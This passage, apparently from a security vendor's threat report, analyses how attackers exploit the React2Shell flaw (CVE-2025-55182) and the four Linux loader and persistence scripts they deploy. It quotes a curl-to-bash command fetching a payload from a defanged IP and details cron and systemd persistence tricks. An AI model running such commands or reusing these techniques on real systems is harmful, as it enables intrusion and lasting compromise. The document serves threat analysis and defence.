React2Shell flaw (CVE-2025-55182) exploited for remote code execution
Figure 2: Examples of suspicious post-exploitation commands executed on Linux
The pattern of these commands is consistent. Remote shell scripts or binaries are downloaded and executed, immediately followed by attempts to clean any trace of the attack. The detected payloads map to known Sophos detections for Linux loaders and agents. Analysis of the retrieved scripts revealed at least four key components, each of which is responsible for a different stage of the attack.
The first script (gfdsgsdfhfsd_ghsfdgsfdgsdfg.sh, detected by Linux/DldrYI) is a multi-stage malware installer that establishes persistent access on Linux systems. Upon execution, it downloads a legitimate Node.js binary to a hidden directory and then deploys two Base64-encoded payloads: an encrypted data file and heavily obfuscated JavaScript malware. The JavaScript component uses AES-256-CBC encryption to decrypt and execute additional payloads, spawns a detached background process to maintain persistence, and implements anti-forensic measures by deleting the original installer script.
The second script (tsd.sh, detected by Linux/AgntGB) implements persistence for a component named ‘tsd’ by creating entries under ‘/etc/cron.hourly/tsd’ and ‘/etc/cron.hourly/tsd.sh’, leveraging systemd where available. If systemd or cron are not effective, then the script reverts to using rc.local. The script ensures that tsd is always running, restarting it if the process is not present to ensure that the host is resistant to simple reboots or process kills.
The third script (init.sh, detected by Linux/AgntGC) is a sophisticated malware deployment tool that establishes persistent system compromise through multiple redundancy mechanisms. Upon execution, it downloads a malicious binary from an AWS S3 bucket (hybird-accesskey-staging-saas[.]s3[.]dualstack[.]ap-northeast-1[.]amazonaws[.]com/agent), installs it to /usr/infju/system_os, and establishes persistence through both systemd service installation and cron-based process management. The malware masquerades as a legitimate system service (system_os.service) with automatic restart capabilities. A separate cron job runs daily at midnight to forcibly restart the process, ensuring continued operation even if the service is manually stopped. The script includes operating system detection for CentOS and Ubuntu, attempts privilege escalation via sudo commands, and creates a process management script that logs all restart activities to /var/log/system_os_management.log. The use of legitimate system directories, systemd integration, and multi-layered persistence mechanisms suggests the script is a professionally developed malware dropper designed for long-term, resilient system compromise. This script includes many Chinese comments, indicating possible links to Chinese-speaking development teams or tooling reuse.
The fourth script (b.sh, detected by Linux/DldrYG) functions as another loader in the ecosystem and is fetched via ‘/bin/sh -c $(curl -sfL hxxp://194[.]38[.]11[.]3:1790/b.sh | bash | gzip -n | base64 -w0)’. The use of curl | bash plus compression and encoding suggests the threat actor intends to limit the creation of artifacts on disk and may be aiming to bypass simple content inspection. The attacker issues a series of curl and nslookup commands against Canarytokens-style domains to confirm the success of the exploit (see Figure 3).
About Author
